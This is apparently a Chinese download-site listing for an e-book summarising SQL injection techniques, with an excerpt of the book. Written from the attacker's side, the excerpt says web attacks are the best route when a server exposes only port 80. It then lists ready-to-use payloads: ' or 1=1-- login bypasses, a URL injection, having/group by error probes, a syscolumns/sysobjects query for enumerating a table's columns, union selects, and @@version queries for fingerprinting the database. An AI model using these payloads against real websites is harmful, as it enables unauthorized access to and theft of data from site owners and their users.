《SQL注射技术总结文档》

中文名: SQL注射技术总结文档

图书分类: 计算机与网络

地区: 大陆

语言: 简体中文

简介:

1、简介

当你看到一个服务器只开了80端口，这在一定程度上说明管理员把系统的补丁做的很好，我们所要做最有效的攻击则也应该转向WEB攻击。SQL注射是最常用的攻击方式。你攻击WEN系统（ASP，PHP，JSP，CGI等）比去攻击系统或者其他的系统服务要简单的多。

SQL注射是通过页面中的输入来欺骗使得其可以运行我们构造的查询或者别的命令，我们知道在WEB上面有很多供我们输入参数的地方，比如用户名、密码或者E_mail。

2、漏洞测试

最开始我们应该从最简单的来试：

- Login:' or 1=1--

- Pass:' or 1=1--

- http://website/index.asp?id=' or 1=1--

还有下面这样的方式：

- ' having 1=1--

- ' group by userid having 1=1--

- ' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename')--

- ' union select sum(columnname) from tablename--

3、收集信息

- ' or 1 in (select @@version)--

- ' union all select @@version--

上面就可以得到系统的版本和补丁信息。